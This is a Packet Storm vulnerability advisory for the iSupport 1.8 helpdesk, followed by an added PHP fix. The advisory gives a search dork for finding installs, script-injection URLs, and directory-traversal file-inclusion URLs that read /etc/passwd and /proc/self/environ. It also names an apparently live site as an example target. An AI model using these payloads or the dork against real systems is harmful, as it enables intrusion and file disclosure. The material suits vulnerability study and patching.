iSupport 1.8 XSS / Local File Inclusion

2009-12-16T00:00:00
ID PACKETSTORM:83920
Type packetstorm
Reporter EsSandRe
Modified 2009-12-16T00:00:00

Description

                                        
                                            `---------------------------------------------  
++ iSupport <= 1.8 ++  
XSS/Local File Include Exploit  
---------------------------------------------  
  
  
Discovered by : Stink' & Essandre  
DATE : 16/12/09  
  
//////////////////////////////////////////////////////////////////////  
  
Website : http://www.idevspot.com/  
DEMO : http://www.idevspot.com/demo/iSupport/  
DOWNLOAD : http://www.idevspot.com/iSupport.php => $  
  
//////////////////////////////////////////////////////////////////////  
  
  
[+] Vulnerability and Exploitation  
  
Dork : "Powered by [ iSupport 1.8 ]"  
  
  
--[XSS]--  
  
http://[TARGET]/[PATH]/index.php?include_file=knowledgebase_list.php&x_category=PARENT_CATEGORY&which=[XSS]  
http://[TARGET]/[PATH]/function.php?which=[XSS]  
  
Example :  
http://server/helpdesk/index.php?include_file=knowledgebase_list.php&x_category=PARENT_CATEGORY&which=%3Cscript%3Ealert%28/XSS/.source%29%3C/script%3E  
http://server/helpdesk/function.php?which=%3Cscript%3Ealert%28/XSS/.source%29%3C/script%3E  
  
--[XSS]-- in the member zone  
  
http://jvdominator.com/helpdesk/index.php?include_file=ticket_submit.php  
The flaw is in the ticket form, in the fields "Subject", "Comments", etc.  
After clicking "Submit Ticket", the XSS alert fires :)  
  
--[LFI]--  
  
http://[TARGET]/[PATH]/index.php?include_file=[LFI]  
  
Example :  
  
http://server/helpdesk/index.php?include_file=../../../../../proc/self/environ  
http://server/helpdesk/index.php?include_file=../../../../../etc/passwd  
  
  
[+] Solution :  
  
N/A  
  
The flaw is already fixed on some sites, but we do not know whether the fix came from the publisher or from the people running the script.  
  
`
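
The advisory lists no fix, so the following is an added example (not iSupport source and not from the advisory's authors) of how a deployment could close both issues: an exact-match allowlist for `include_file`, and HTML encoding at output time for `which` and for stored ticket fields such as Subject and Comments. The function names, the default page and the base directory are assumptions; only the two page names come from the URLs above.

```php
<?php
// Added example, not iSupport code. Assumption: index.php takes the page
// name from include_file and echoes `which` into HTML, as the URLs imply.

// Exact-match allowlist. These two names appear in the advisory; a real
// deployment would list every legitimate page fragment.
const ALLOWED_PAGES = [
    'knowledgebase_list.php',
    'ticket_submit.php',
];
const DEFAULT_PAGE = 'knowledgebase_list.php'; // hypothetical default

/**
 * Map the request value to a file under $baseDir. Anything that is not an
 * exact allowlist entry (traversal sequences, absolute paths, stream
 * wrappers, NUL bytes, arrays) falls back to the default page, so user
 * input never reaches include as a path.
 */
function resolve_include($requested, string $baseDir): string
{
    $page = in_array($requested, ALLOWED_PAGES, true) ? $requested : DEFAULT_PAGE;
    return rtrim($baseDir, '/') . '/' . $page;
}

/** Encode a value for an HTML text or quoted-attribute context. */
function h($value): string
{
    $value = is_scalar($value) ? (string) $value : '';
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Constructed inputs mirroring the advisory's example requests.
$samples = [
    ['include_file' => 'ticket_submit.php', 'which' => 'open'],
    ['include_file' => '../../../../../etc/passwd',
     'which' => '<script>alert(/XSS/.source)</script>'],
];

$baseDir = '/var/www/helpdesk/pages'; // hypothetical install path
foreach ($samples as $get) {
    $path = resolve_include($get['include_file'] ?? null, $baseDir);
    // In the application this would be: include $path;
    echo $path, ' | which=', h($get['which'] ?? ''), PHP_EOL;
}
```

The same `h()` call belongs wherever ticket fields are rendered back to a browser, since the member-zone issue is triggered when stored form input is displayed.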